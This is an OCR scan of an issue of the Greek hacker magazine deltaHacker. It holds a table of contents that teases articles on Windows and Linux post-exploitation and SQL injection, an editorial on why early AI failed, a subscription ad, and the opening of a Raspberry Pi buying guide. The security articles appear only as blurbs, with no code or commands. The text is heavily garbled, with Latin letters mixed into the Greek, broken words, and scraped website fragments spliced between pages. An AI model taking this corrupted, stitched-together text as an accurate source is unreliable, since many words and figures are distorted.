ους 6,40€ 
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τν ΝΗ, mania! 


Παιχνίδια µετά το exploitation 
«OpenVZ: AK-47s, h 


[*] κι ακόµα είμαστε στην προθέρµανση ;) 


ἵ και οδηγίες χρήσης 


εντιτορια 


Όχι και το τόσο τυχαίες σκέψεις, 
σε OXI και τόσο τυχαία σειρά 


σνειλ μει 


O Θείος Ακάκιος καταλαβαίνει --κι εξηγεί-- γιατί ως σήμερα 
έχουν αποτύχει όλες οι προσπάθειες για τη δηµιουργία 
Τεχνητῆς Νοημοσύνης 


Raspberry Pi για ολους, 
για υγεία και χαρά 


O μικρός, εξαιρετικά οικονομικός, ενεργειακά ευγενι- 
KOC κι εντελώς αθόρυβος υπολογιστής µε το χαριτωμέ- 
νο ὄνομα, ἔχει και µπορεί να µας προσφέρει 
πολλά περισσότερα απ' όσα νομίζουμε 


Python & wxPython: 
The wxEditor Project 


Συνεχίζουμε τα μαθήματα κατασκευής εφαρμογών για TO πε- 

ριβάλλον γραφικών δείχνοντάς σας πώς να φτιάξετε τον δικό 

σας text editor, τον οποίο φυσικά θα χρησιμοποιήσετε για τη 
μετέπειτα ανάπτυξη του editor... 


OpenVZ: AK-47s, for everyone! 
(μέρος 1, η απαραίτητη υποδομή) 


O σχεδόν παροπλισµένος σας υπολογιστής που νομίζα- 
τε ότι δεν έχει κάτι να σας προσφέρει, στην πραγματι- 
κότητα µπορεί να μετατραπεί σε έναν 
ικανότατο virtualization host! 


Post-exploitation games 
on Windows 


Το αληθινό hacking δεν έχει καμία, μα εντελώς καμία σχέση µε ό,τι 
βλέπουμε στις ταινίες. H εισβολή μάλιστα σε ένα μηχάνημα, εἶναι 
μόνο η αρχή των προκλήσεων TOU έχει να αντιμετωπίσει ο επίδοξος 
penetration tester... 


H ισχυς εν τη ενώσει! 


Αν και στις µέρες µας πολλές ενώσεις αποτυγχάνουν πατα- 
γωδώς, EKEIV που σχετίζεται µε τη τεχνική επιθέσεων TOU 
SQL injection έχει πολλά να µας δώσει. 


Οι επιτιθέµενοι δεν κάνουν διακρίσεις στα λειτουργικά συστή- 
ματα που τρέχουν οι στόχοι τους. Μετά από µια επιτυχημένη 
εισβολή σε μηχάνημα µε Linux, ο καλός penetration tester ξέρει 
πώς να κινηθεί «και σ' αυτό το περιβάλλον... 


OpenVZ: ΑΚ-475, for everyone! 
(μέρος 2, η αποκάλυψη) 


Μετά το στήσιμο της απαραίτητης υποδομής για τη HE- 
τατροπή ενός ταπεινού PC σε virtualization powerhouse, 
δίνουμε όλες τις λεπτομέρειες για το Setup και το χειρισμό 

του θαυμάσιου Software που πρέπει να ἔχει! 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 
Αρχισυντάκτης Παναγιώτης Βαρελάς 
Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 


Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Ανδρέας 
Βενιέρης, Γιώργος Γιάννου, Μανώλης Κιαγιάς, Ιωάννης 
Κονιάρης, Γιώργος Μελέκος, Νίκος Μουρατίδης, Νικόλαος 
Σηφάκης, Μέσος Παπαδόπουλος (TM), Χρίστος Τόμπρας 


Γραμματική επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το περιοδικὀ deltaHacker εἶναι συνδρομητικό και εκδίδεται and την Parabing Creations 
δώδεκα φορὲς το χρόνο, κάθε μήνα. H Parabing Creations έχει την έδρα της στη Μαιώτιδος. 
3, 55 133, Καλαμαριά. H εκτύπωση και η βιβλιοδεσία γίνονται ano την ThessPrint Α.Ε. To 
email επικοινωνίας του περιοδικοὐ εἶναι το talk2us@deltahacker.gr και το email για τις 
συνδρομές το subscriptions@deltahacker.gr. Οι πληροφορἱες για τις συνδρομὲς εἶναι στο 
http://deltahacker.gr/subscriptions και οι παραγγελἰες γίνονται ano το http://deltahacker. 
gr/order. Όλες οι απόψεις που εκφράζονται στα άρθρα δεν εκφράζουν απαραίτητα και τη 
γνώμη του περιοδικού. 


(5) Γράφουν τα πηθικάκια Σαίξπηρ; 
H απάντηση στο http://deltahacker.gr/?p=6608 
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Πλήρη άρθρα που συμπληρώνουν το περιοδικό 


MDS re 


Posted by cio 


περιοδικό ~ forums /var/iog/messages /dev/random addenda bftp 1ns3cure canned streams 


Όνομα χρήστη: 


deltaHacker 012 -- California Dreaming 2 
Edition 


Posted by 


Κωδικός: 


M Να µε θυμάσαι 
Σύνδεση» 


11/09/2012, 08:24 | Published in 


Το φθινόπωρο έκανε δειλά δειλά την εμφάνισή του κι εμείς έχουµε 
αρχίσει από τώρα το ζέσταμα για τους συναρπαστικούς µήνες που 
ἔρχονται --- deltaHacker wise! Σε λίγες εβδομάδες εξάλλου θα γιορτάζουμε 
τα πρώτα γενέθλια του πολυαγαπηµένου µας περιοδικού, οπότε δεν 
μπορούμε να σκεφτούμε καλύτερο τρόπο να το τιμήσουμε από το να 
προγραμματίζουμε από τώρα ορισμένα κεντρικά θέµατα για τα τεύχη 


Εγγραφή. 


Χάσατε τον κωδικό σας; 


που έρχονται. Στο deltaHacker 012 (τεύχος Σεπτεμβρίου) δίνουμε µια 
μικρή ιδέα από αυτά που θα ακολουθήσουν! απ 


deltaHacker 011 - Lazy August Edition 


Posted by s 07/08/2012, 22:19 | Published in 


Ὁ Αύγουστος είναι πάντα τεμπέλης, όχι όµως για το delt: 
για ψιλοαδιάφορο, χαλαρό περιεχόµενο, το τεύχ. οἱ 
έρχεται µε δυνατά θέµατα που κανείς 
-- τώρα ή οποιονδήποτε άλλο u 
πρέπει να διαβάσετε το κεντ 

ΠΙΟ οποίο αφενός σας καλι 


σας δείχνουμε πώ 


deltaHacker 0 


μήνες! Mağ µε Κάθε. 


Ὁ δαφημσυς you D> 


lacker 
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/2012, 19:16 
S19 | Published in a 2 
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18/05, Όνομα χρήστη; 


Κωδικός; 


: Να με θυμάσαι 
Sivbeon » 


Εγγραφή 


Χάσατε τον κωδικό σας, 


ὃν ατα | 30/08/20, 
72012, 1147 
x | Published in 


Σε εκτενές apa, 


Python Game Progra 


Posted by 
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Τα εβδομαδιαία µας 


video casts [έρχονται, έρχονται]. Ολόκληρα blasts from the past. 
Τα βίντεο από ta live streams. Ta πάντα ενδιαφέροντα forums. Το 


σημείο συνάντησης για τους φίλους του περιοδικού. H πιο ζωντανή 
κοινότητα και οι πιο ανήσυχοι, δημιουργικοῖΐ χρήστες | 


deltahacker.gr 


What have you hacked for me lately? 
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Αγαπητοί µου, 
ΤΠλησνάζει το τέλος Σεπτέμβρη» Εύναν καν πάλι Κυριακή, καν σύμφωνα”μ 
την µικρή ατζέντα της Κυρίας Καΐτης, σήμερᾳ εορτάζεται η μνήμη των Οσίων 
Βανθίππης καν Πολυξένης. s , 
d 

Μπροστά µου έχω τα δώδεκα τεύχη του χαρυτωµένου τούτου περιοδικού 
--αντού καλέ, που πρατάτε αυτή τη στιγµή στα χέρια σας, καν που σας Ep— 
χεται ταχυδρομικώς µια φορά στο τόσο-- καν έχω μείνεν να τα κοιτάζω. 

Ῥκέφτομαι, πολύ ωραίο αυτό το YPAPLOTLHO KOATGKL µε το κόκκινο ανά- 
δελτα στις ράχες των τευχών. Πολύ ευρηµατικὀ. Αναρωτιέµαν τν θα έχει 
σκεφτεί ο DIP Guy (IM) γνα το επόμενο τεύχος. θα επαναλάβει το μοτίβο, 
ή θα περάσει στα επόμενα γράμματα; 

Βλέπετε, αυτά εἶναι τα μυστήρια του χρόνου. Αυτή τη στιγµή, γράφω γνα 
κάτι το οποίο εσείς έχετε στα χέρια σας, αλλά εγώ ὀχν. Στο μυαλό μου το 
τεύχος υπάρχεν ως προσδοκία, ἡ πρόβλεφη, αλλά ως αντικείµενο δεν υφί- 
σταταν. Μπορεί καν να µην υπάρδεν ποτέ, υπό την έννονα OTL µπορεί τελικά 
το τεύχος να μη καταφέρεν να φτάσεν στα χέρια σας. 

Χτυπάω ξύλο βέβαια. Δεν πάνω δυσοίωνες προφητείες για το μέλλον του 
περιοδικού, πιστέφτε µε. Χίλνον λόγον υπάρχουν να μην φτάσει στα χέρια 
σας. Μπορεί ας πούμε να το Χλέφανε από την είσοδο της πολυκατοικίας που 
το άφησε ο ταχυδρόμος. H να το πήρε ο ταχυδρόμος σπίτι του, γιατί του 
άρεσε. H να είχαν απεργία στο ταχυδρομείο και να έχεν μείνει στα υπόγεια 
του κέντρον διαλογής. 

Χίλνον λόγον, πραγματυκά. 

To ενδιαφέρον (καν παράδοξο συνάμα) elvat ακριβώς αυτό: Ότι εμείς ον 
άνθρωπον έχουμε έναν τρόπο να μυλάμε και να αναφερόμαστε σε αντικεί- 
μενα, χωρίς αυτά τα αντικείμενα να μοιράζονται κατ' ανάγκην καμία άλλη 
νδνότητα, πέραν TOV OTL αναφερόμαστε σε αυτά εντός ενός συγκεκριμένου 
πλαισίου -- καν µε έναν συγκεκριµένο τρόπο. 


EH λέξη κλειδί στην TLO πάνω φράση είναι TO «κατ' ανάγκην». Σκεφτείτε 
το. TL κοινό EXEL το αντικείµενο πον προσδιορίζεται µε το όνομα «τεύχος 
Οκτωβρίου του περιοδικού δέλτα χάκερ» όταν γράφω εγώ YL αυτό σήμε- 
pa, Οσίων Βανθίππης και Πολυξένης, και όταν διαβάζετε εσείς γι αυτό στα 
µέσα Οκτωβρίου (ἡ όποτε λάβετε το τεύχος στα χέρια, εφόσον δεν σας το 
πλέφανε AMO την πολυκατοικία ἡ δεν έχεν ξεµείνεν στα υπόγεια του κέντρου 
διαλογής); 

Τίποτα. Δεν μοιράζονταν καμία ιδιότητα. 


Ούτε καν την ιδιότητα της ύπαρξης, καθώς το τεύχος για το οποίο σας 
γράφω ακόμα δεν υπάρχει, ενώ το τεύχος που εσείς διαβάζετε υπάρχει µια 
χαρά (έστω καν αν σας το ΧἈλέφανε, καν δεν µπορείτε πλέον να το διαβάσε- 
τε). 

Μοιράζονταν όµως το όνομα. Αυτό εννοώ. Ότι στις συνεννοήσεις μεταξύ 
τους ον άνθρωπον δεν αναφέρονταν (κατ' ανάγκην) σε αντικείµενα αυτού 
του κόσμον, παρά σε αναφορικούς δείκτες (ονόματα) εντός εκείνων των 


Σνέιλ μέιλ 


μμ 


συγκεκριμένων διανθρώπυνων πλαισίων, στα οποία ον συγκεκρνµένον δείκτες 
δεν στερούνται νοήµατος. 
Γονυάονυ. Πού τα βρίσκω όλα αυτά καν τα λέω, μου λέτε} 


Δεν ξέρω πού τα βρίσκω, αλλά πλάκα πλάκα, στην πιο πάνω περιγραφή 
ἔγκενταν το μυστικό γιατί είχαν αποτύχει µέχρν τώρα όλες OL προσπάθειες 
να φτιαχτεί τεχνητή νοημοσύνη. Καθώς και το μυστικό της επιτυχίας του 
Google. 


Σας υντρίγκαρα, E$ 


Κοντάξτε: Ον προσπάθειες να φτιαχτεί τεχνητή νοημοσύνη στηρίζονταν 
στην ιδέα OTL θα φτιάξουμε ένα μοντέλο για το πώς λειτουργεί η ανθρώπινη 
νοημοσύνη, καν µετά θα το μυμηθούμε. 

Πιάσαν τα μολύβια, λοιπόν, ον αρχιτέκτονες των συστηµάτων ΙΝ καν áp- 
χισαν να σκέφτονται. TL σκέφτηκαν; OTL OL άνθρωπον χρησιμοποιούν την 
γλώσσα, OTL η γλώσσα έχει «λέξεις» πον αναφέρονται σε αντικείµενα µε τα 
οποία ον άνθρωπον αλληλεπιδρούν µε τον έναν ή τον άλλο τρόπο, καν ότι η 
σχέφη δεν εἶναι παρά ο συνδυασμός των «λέξεων» αυτών σε προτάσεις, σύμ- 
φωνα µε συγκεκριµένους κανόνες. (Ύπερ-υπεραπλουστεύω, βέβαια, αλλά µην 
κολλάτε στις λεπτομέρειες). H νοημοσύνη, λοιπόν, δεν είναν παρά ο συνδυ- 
ασμός των προτάσεων αυτών σε συλλογισμούς, σύμφωνα µε άλλους κανόνες. 
Όσο πνο γρήγορα, τόσο πιο έξυπνα. 


Αυτό σκέφτηκαν ον πρώτον σχεδιαστές συστηµάτων IN καν βάλθηκαν να 
χωδικοποιούν σε αλγόριθμους τους κανόνες συνδυασμού των «λέξεων» καν 
τους κανόνες σχηματισμού «συλλογνσμών». 


Ta συστήµατά τους γίνονταν ολοένα καν πιο πολύπλοκα, OL κανόνες OAO— 
ένα καν περισσότεροι, ον εξαιρέσεις καν ον διευκρινήσεις ολοένα καν περισ- 
σότερες, HAL AMO ευφνία sss HNA. O χομπνούτορας παρέμενε µέσα στην άφατη 
βλακεία. 


ΟΚ, λοιπόν. Υπαναχώρηση. «Εφόσον δεν μπορούμε να κωδικοποιήσουµε το 
σύνολο της ανθρώπινης σκέφης», σκεφτήκανε ον επιστηµονάδες, «θα κωδυ- 
κοπονήσουμε τομείς γνώσεων. Τέλεια!» 

Ον παλιότερον θα θυμούνται τα Expert systems, που τάχα pov θα 
υποκαθιστούσαν --έγραφαν τα έκθαµβα άρθρα του ειδικού τύπον-- τους 
γνατρούς, τους μηχανικούς, τους δικηγόρους και δεν ξέρω ποιόν άλλον -- 
τους δημοσιογράφους ἴσως. 
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OVELA μένλ 


VHAGKER 
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Ναι, καλά. Βυπνήστε µε όταν εἶναι να φάμε. 
Πού ήταν το λάθος; 
Να, φυσικά στο μοντέλο που προσπαθούσαν να μιμηθούν. 


Ον επιστηµονάδες φαντάζονταν OTL η νοημοσύνη έγµενταν στον χειρισμό 
συμβόλων βάσει κανόνων, ενώ απὀ παντού προέκυπτε OTL δεν ήταν αυτό. H 
ότι δεν ήταν Ὑμόνοχ αυτό. OTL κάτι έλειπε, HAL μάλιστα OTL αυτό το "πάτν" 
ήταν τόσο σημαντικό, ώστε ακόµα καν µετά την αλγοριθµοποίηση μυριάδων 
κανόνων, το σύστημα παρέμενε τόσο χαζό όσο και ο μπούφος. 


Σας το έγραφα και πιο πριν. Το μυστικό βρίσκεται στο OTL στις αλ- 
ληλεπιδράσεις μεταξύ τους, ον άνθρωπον δεν χρησιυμοποιούν σύμβολα που 
αντιστοιχούν σε αντικείµενα αυτού του κόσμον, παρά αναφορικούς δείκτες 
εντός εκείνων μόνο των συγκεκριμένων διανθρώπυνων πλαισίων στα οποία OL 
συγκεκρνµένον δείκτες δεν στερούνταν νοήματος. 

EH λέξη κλειδί, εδώ, εἶναι η λέξη «δνανθρώπινος» -όπως λέμε δια- 
δικτνακός, στα αγγλικά θα το λέγαμε inter-human. 


Σκεφτείτε το. Ον άνθρωπον δεν χρησιμοποιούν σύμβολα µε προδιαγεγραμ- 
PEVO πεδίο αναφοράς, αλλά µόνο αναφορικούς δείκτες που δεν στερούνταν 
νοήματος εντός συγκεκρυµένων πλαισίων δι- ανθρώπινων αλληλεπιδράσεων. 
Ληλαδήῆ, το OTL λέω «γάτα» καθίσταται δείκτης αναφοράς προς τη γάτα που 
περνάεν το δρόμο µόνο κατά το μέτρο που άλλον άνθρωποι μοιράζονται µε 
μένα αυτό το πλαίσιο αναφοράς. [va να το πω επιγραμματικά: Δεν χρησι- 
ponow σύμβολα αντικευµένων αλλά μοιράζομαι δείκτες αναφοράς, αλληλε- 
πιδρώντας µε άλλους ανθρώπους. 

Tt αυτό καν µας είναν τόσο EVKOAO να παρεξηγούμε ο ένας τον όλλο, 


ἡ να αλληλοσκοτωνόμαστε για χρόνια καν χρόνια γνα το τάδε ἡ το δείνα 
θέμα, Χαν µετά να το ποιτάµε καν να λέμε WIF? 


Tt αυτό χι εγώ μπορώ να σας γράφω για το τεύχος Οκτωβρίου του δέλτα 
χάκερ ενώ το τεύχος δεν υπάρχει ακόµα, καν δεν ξέρουμε καν τη μορφή του 
όταν (καν αν!) θα φτάσεν στα χέρια σας. 

Καν γι αυτό η προσέγγιση tov Google στα ζητήματα τεχνητής νοηµο- 
σύνης αποδεικνύεται τόσο επιτυχημένη. Επειδή το Google δεν επιχειρεί va 
προβλέφει ἡ να αλγορνθµοποιήσεν τους κανόνες µε τους οποίους εἶναι επι- 
τρεπτὀ να συνδυάζονται ον «λέξεις» HAL ον «προτάσεις» εντός µιας γλώσ- 
σας. To Google αδιαφορεί παντελώς για αυτό. Το µόνο πον κάνει είναν να 
προσπαθεί να φτιάξει Φηφιακά μοντέλα όσων δι-ανθρώπινων αλληλεπιδράσε- 
ων αποτυπώνονταν εντός του διαδικτύου. Τίποτα άλλο. Αλληλεπιδράσεων == 
όχν συμβόλων, ούτε δεικτών αναφοράς. Αυτά δεν ενδιαφέρουν το Google. 
Ούτε η γλώσσα, οὔτε ον λέξεις, οὖτε καν ον κανόνες. Αυτά θα προκύφουν. 

Όπως προέκνφε η εικόνα της γάτας όταν OL ερευνητάδες του Google 
Neural Network Learning Project έβαλαν το σύστημα να διατρέξεν μερυκά. 
εκατομμύρια βίντεα του γνουτινούμπ, χωρίς κανείς να του EXEL EX των NPO- 
τέρων εξηγήσει OTL υπάρχουν γάτες καν πώς μοιάζουν. 

AUTÓ... 


Σας είχα υποσχεθεί, αγαπητοί µου, στο προηγούμενο τεύχος, ÓTL θα 
ἕκανα σήµερα PLAV ανασκόπηση TOV έτους που µας πέρασε. Με αυτά καν µε 
αυτά παρασύρθηκα καν άρχισα να γράφω για τεχνητή νοημοσύνη. 

Δεν πειράζεν. Λίγη ποικιλία δεν βλάπτει. 


Άλλωστε scripta manent. Ta τεύχη τα έχετε. Ας κάνεν ο καθείς την δική 
του ανασκόπηση. 


Σας ασπάζομαι, 
θείος Ακάκιος 
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Είστε από εκείνους Αν ναι, τότε εἴστε αναγνώστης 
που δεν βλέπουν τον υπολογιστή τους : του περιοδικού deltaHacker 
ως άλλη µια οικιακή συσκευή; έστω κι αν δεν έχετε γίνει ακόµα! 


To deltaHacker έχει ως αποκλειστική αποστολή 
να ξυπνήσει τον δημιουργικό χάκερ µέσα σας 
και για να το πετύχει κυκλοφορεί 12 φορές το χρόνο 
αλλά όχι στα περίπτερα. 


Γίνετε τώρα συνδρομητής στο ένα και μοναδικό περιοδικό που ακονίζει το μυαλό 
και κάνει τους υπολογιστές, τα δίκτυα και TO hardware ξανά ενδιαφέροντα. 


Χαρίστε στον εαυτό σας ή στους ανθρώπους σας 
µια συνδρομή στο περιοδικό 


V HA@KER 


Γεύσεις από την ύλη του περιοδικού στο http://deltaHacker.gr 
Αγορές τευχών/συνδρομών στο http://deltaHacker.gr/order 


[5 http://twitter/deltaHacker 
E E äeltaHack To deltaHacker είναι αποκλειστικά συνδρομητικό, αποστέλλεται ταχυδρομικά και δεν 
F ttp://facebook.com/deltaHacker κυκλοφορεί στα περίπτερα. Οι αγορές μεμονωμένων τευχών ή συνδρομών γίνονται 


http://gplus.to/deltaHacker δικτυακά, από το http://deltaHacker.gr/order 


Skill: Beginner 


y Tags: Raspberry 
δρ Einu, 


Debian, 
Raspbian, 
OpenVPN, SSH, 
SAMBA, Squid 


by subZrauw 


Ἐναν nepinou χρόνο πριν, ο ενθουσιασμὀς για το 
Rasbperry Pi εἶχε non αρχίσει να διογκώνεται o’ 
ὀλοκληρο τον πλανήτη. Ἠταν τότε που ἐσκασαν 
οι πρὠτες ειδήσεις αναφορικἁ µε την επικείµενη 
κυκλοφορία ενὸς πάμφθηνου υπολογιστή, ο οποΐος 
θα ἐτρεχε Linux και θα ἦταν αρκετά ισχυρός για 
γενική χρήση. Meta ano καθυστέρηση ἐξι περίπου 
μηνών, που για όσους εἶχαν προπαραγγεῖίλει 
φάνηκαν σαν έξι περίπου χρόνια, κοντὰ στα μέσα της 
περασμένης ἄνοιξης τα πρῶτα Raspberry Pi άρχισαν 
να καταφθάνουν στους τυχερούς τους παραλήπτες. 
Πάντως µη γελιέστε: Ακόμη και σήμερα, η απόκτηση 
ενὸς Raspberry Pi σε διδάσκει την αρετή της 
υπομονής. Υποχρεωτικά. 


r ir en 


Raspberry Pi γιά όλους, 
γιά υγεία καὶ xded! 


Με 27 περίπου 
ευρώ, χωρίς τα 
µεταφορικἀ, 
παίρνετε ἑναν 
πλήρη υπολογιστή 
χωρίς κουδουνόκια 
και σφυρίχτρες, 
όπως λέει κι ο κος 
Αρχισυντάκτης 
(ΤΜ). Ως προς την 
ισχύ του κεντρι- 
κού επεξεργαστή, 
ΤΟ Raspberry Pi 
εἶναι ἑνας Pentium 
Π. Ως προς την 
ισχύ του επεξερ- 
γαστή γραφικών, 
εἶναι ἑνα Xbox 1. 
Συνυπολογίστε To 
μικρό του μέγεθος, 
την εξαιρετικἁ 
χαμηλή κατανά- 
λωση ενέργειας 
και την παντελώς 
αθόρυβη λειτουρ- 
γία του, οπὀτε 
ξαφνικά έχετε µια 
άριστη πλατφόρμα 
για εκπαίδευση, για 
εφαρμογές server 
στο σπίτι ἡ στο 
γραφείο, για χαλα- 
po gaming παντού 
ἡ για ἑνα πλήρες 
media center στο 
σαλόνι. 
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O κύριος λὀγος που ο TUNIKOG χρόνος αναμονὴς yia Eva Raspberry Pi 
παραμένει κοντὰ στις τἐσσερεις βδομάδες, σχετίζεται µε το χαμηλό του 
κόστος σε συνάρτηση, Φυσικά, µε τη ζήτηση και την παραγωγἠ. Yndp- 
χουν δύο μοντέλα, To A και To B, τα οποία διαφέρουν στο πλήθος των 
θυρών USB (µία για το model A, δύο για To model B), καθώς και στη θύρα 
Ethernet (μόνο το model B ἐχει). Το model A, λοιπὀν, βγαίνει στα 25 
δολάρια, ενώ το model B στα 35 δολάρια. Μιλάμε, δηλαδή, για 19 και 27 
ευρώ αντίστοιχα. Τι παίρνει όμως κάποιος µε αυτά τα χρήματα; Υπὸ ποία 
ἐννοια το Raspberry Pi εἶναι ἑνας πλήρης υπολογιστής; Nari οι φίλοι της 
τεχνολογίας --του γράφοντα συμπεριλαμβανομένου-- ¿xouv κυριευτεί 
ano τέτοια μανία για To Pi; Τι μπορούμε να κάνουμε p’ αυτὀ; Ποιες εἶναι 
οι δικὲς µας εντυπώσεις and τη συσκευἠ; Αυτά, αγαπητὲς φίλες κι aya- 
nntoi φίλοι, εἶναι μερικὰ μόνο απὸ τα ερωτήματα και θέματα, µε τα οποία 
καταπιανόµαστε στο παρὸν ἀρθρο. 


Συνεχἰστε το διάβασμα. 


Τι εἶναι το Raspberry Pi 


Πρόκειται για µια µικρή πλακέτα µε μήκος 8,56 εκατοστά, πλάτος 5,6 
εκατοστά και ύψος 21 χιλιοστά. Το βάρος της εἶναι 45 γραμμάρια και 
πάνω της φέρει ὁ,τι χρειάζεται, ὥστε να μιλάμε για Evav πλήρη υπολο- 
γιστἠ. 


Αναλυτικότερα, η CPU εἶναι ἑνας ARM11 στα 700ΜΗΖ. Υπάρχει ξεχωρι- 
στἠ GPU, η Videocore 4, ικανἠ για ομαλή avanapaywyn full HD video, 
συμπιεσμένου κατὰ Η.264. H CPU και η GPU εἶναι στην ἴδια συσκευασία 
και συγκεκριµένα στο BCM2835 SoC της Broadcom. H δε μνήμη RAM έχει 
μέγεθος 256MB και βρίσκεται πάνω ano το προαναφερθὲν SOC. Πα την 
αποθήκευση λειτουργικού συτήματος, εφαρμογών και δεδοµένων του 
χρήστη, παρέχεται pia εἰσοδος για κάρτα SD. 


Ano εκεἰ και πέρα, για την ἑξοδο εικόνας και ἠχου υπάρχει ψηφιακἠ θύρα 
HDMI, καθὼς και δύο αναλογικὲς: µία για εικὀνα (RCA) κι ἄλλη μία για 
ἠχο (3,5mm jack). Επιπλέον, To model A φέρει μία θύρα USB 2.0, ενὼ 
το model Β φέρει δύο θύρες USB 
2.0 καθὼς *kai* θύρα Ethernet 
10/100. 


Αμφότερα τα μοντέλα φέρουν Eva 
26πινο header expansion slot, ená- 
vw στο οποἰο μπορούν va κουμπώ- 
σουν περιφερειακἀ και κάρτες ENE- 
κτασης. 


Αν δεν συνυπολογίσουµμε την 
ισχύ της GPU, το μικροσκοπικὀ 
Raspberry Pi μπορεἰ να συγκρι- 
θεὶ µε ἑναν υπολογιστή κλάσης 
Pentium II στα 300ΜΗΖ. H δε ισχὺς 
της GPU συγκρίνεται p’ εκείνη του 
επεξεργαστή γραφικών που εἰχε TO 
πρῶτο Xbox. 


Γιατί τόση μεγάλη ζήτηση; 


Το χαμηλὀ κόστος εἶναι ο προφα- 
vnc λόγος. Υπάρχουν ὁμως κι ἆλ- 
λοι. Μην ξεχνάτε ὁτι το Raspberry 
Pi εἶναι ἑνας πλήρης υπολογιστής, 
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εντελὠς αθὀρυβος κι εξαιρετικά χαμηλἠὴς κατανάλωσης, ο οποίος μπορεὶ 
και τρέχει σύγχρονα λειτουργικἁ συστήματα. Αποτελεί λοιπὀν µιας npo- 
της τάξεως πλατφόρμα, π.χ., για το στήσιμο ενὸς media box, για εφαρµο- 
γὲς server ἡ για προγραμματισμὀ. Εἶναι επἰσης πολύτιμο --ἠ τουλάχιστον 
πληροί ὀλες τις προὐποθέσεις ὥστε να αποδειχθεἰ πολύτιμο-- και για TO 
χώρο της εκπαἰδευσης. AUTO μάλιστα ἦταν και το βασικὀ κίνητρο πἰσω 
ano την apxikn ιδέα και τη μετέπειτα σχεδίαση και υλοποἰησὴ του, ano 
την πλευρά των ανθρώπων του σημερινού Raspberry Pi Foundation (www. 
raspberrypi.org). 


Προαπαιτούμενα, απαραίτητα και µη 


To Raspberry Pi ano μόνο του δεν μπορεἰ να κάνει τίποτε, τουλάχιστον 
OX! πριν το τροφοδοτήσουµε µε ρεύμα απὀ EEWTEPIKO τροφοδοτικὀ 5V, 
μέσω της θύρας micro USB που βρίσκεται πάνω στο board. Στα απολύτως 
απαραἰτητα εἶναι και µια κἆρτα SD, η οποία θα φιλοξενήσει το λειτουργι- 
KO σύστημα. H κάρτα προτείνεται να εἶναι Class 4 ἡ καλύτερη (γρηγορὀ- 
τερη), µε χωρητικότητα τουλάχιστον 4GB. 


Αν προσανατολἰζεστε προς το model A ἡ σκοπεύετε να δουλέψετε TO 
Raspberry Pi ως ἑναν τυπικὀ υπολογιστή desktop, θα χρειαστείτε επἰ- 
σης πληκτρολόγιο και ποντίκι -- εννοεἶται τύπου USB. Πα παρόμοιους 
λόγους θα χρειαστεἰτε καλώδιο HDMI για την ψηφιακή σύνδεση σε TV ἡ 
σε monitor (μέσω μετατροπέα HDMI σε DVI). Πα αναλογικἠ σύνδεση θα 
πρέπει να ἐχετε κάποιο καλώδιο Composite. 


Στην περίπτωση του model A εἶναι πολὺ πιθανὀ να θελήσετε κι éva USB 
hub, ὥστε να συνδέσετε εὐκολα στο board περισσότερες ano μία συ- 
σκευὲς (π.χ., Eva wireless USB receiver για πληκτρολόγιο/ποντἰκι, Eva 
USB thumb drive k.d.). Και µιας και μιλάμε για USB, va υπογραμμίσουμε 
εδὠ ὁτι οι προδιαγραφἑς Tou board δεν επιτρέπουν την επαρκἠ τροφο- 
δοσἰα συσκευών ὁπως σκληροί δίσκοι, µέσω USB. Έτσι, αν σχεδιάζετε va 
συνδέσετε στο Pi σας Evav μεγάλο δίσκο για να στήσετε vav ωραιότατο 
fileserver, τότε εἰτε ο δίσκος θα πρέπει να ἐχει τη δικἠ του, ξεχωριστή 
τροφοδοσία, cite θα χρειαστεί να τον συνδέσετε σ’ Eva powered USB 
hub. 


τώρα, av ἐχετε TO model B και σας ενδιαφέρουν κυρίως εφαρμογές 
server, τότε το μόνο που θα χρειαστείτε εἶναι Eva καλώδιο Ethernet: Ano 
ἑναν οποιονδήποτε ἆλλον υπολογιστή θα συνδέεστε στο Raspberry Pi 
μέσω SSH και συνεπὠς θα ἐχετε πλήρη πρὀσβαση στο σύστημα. 


Να σημειώσουμε τέλος ὁτι TO Raspberry Pi πωλεῖται σκέτο, χωρἰς τρο- 
φοδοτικὀ, καλώδια, αξεσουάρ ἡ κάποια θήκη. Αν θέλετε να του χαρίσετε 
ἑνα σπιτάκι, για να µην εἶναι εκτεθειμένο και μαζεύει OKOVN, θα πρέπει να 
αγοράσετε μία θήκη ξεχωριστὰ. 


Δυνατότητες αγοράς 


Οι δύο διανομεἰς µετους οποίους συνεργάζεται το Raspberry Pi Foundation 
εἶναι οι Farnell/element 14 (http://uk.farnell.com/raspberry-pi) και RS 
Components (www.rs-components.com/raspberrypi). Εκτὸς ano το ἴδιο το 
Pi, ο ενδιαφερόμενος µπορεἰ να βρει καλώδια, αξεσουάρ, κάρτες SD, τρο- 
φοδοτικἁ και χρήσιμα περιφερειακά, ὁπως, π.χ., powered USB hubs. 


Ano τη μεριά µας, Non ano τον περασμένο χειμώνα εἰχαμε παραγγείλει 
va Raspberry Pi ano Farnell κι ἄλλο va ano RS (και τα δύο model B). Κι 
ενώ περιμέναμε για µια εκτιμώμενη ημερομηνία παράδοσης, στις αρχὲς 
της άνοιξης ανακαλύψαμε και το ModMyPi (www.modmypi.com), ¿va site ano 
το οποίο µπορεἰ κανεὶς να παραγγείλει θήκες διαφόρων χρωμάτων για 
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το Pi. NapayyeiAaue pia κι έφτασε τον περασμένο Ιούνιο, τότε περίπου 
που κατέφθασαν και τα δύο Raspberry. Σήμερα, απὀ To site του ModMyPi 
EKTOG απὀ τις θήκες µπορεί κανεὶς ν΄’ αγοράσει και το ἰδιο το Pi, καθὼς κι 
ἑνα πλήθος περιφερειακών. 


H anapaitntn προετοιμασία 


Ano πλευράς software, το Raspberry Pi χρειάζεται φυσικά éva λειτουρ- 
γικὀ σύστημα. Από το www.raspberrypi.org/downloads διατίθενται images 
διαφόρων διανομών Linux, ¿Toia για γράψιμο σε κάρτα SD ano την 
οποία θα εκκινεἰ η συσκευἠ. Τα συγκεκριµένα images δεν αντιγράφονται 
ἐτσι απλἀ στην SD. Αντίθετα, γράφονται µέσω του κατάλληλου software. 
Ένα σχετικὀ εργαλείο για τα Windows εἶναι το Win32DiskImager (https:// 
launchpad.net/win32-image-writer/+download), ενώ αν δουλεύουμε σε nE- 
ριβάλλον Linux μπορούμε απλὰἁ να καταφύγουµε στο dd. 


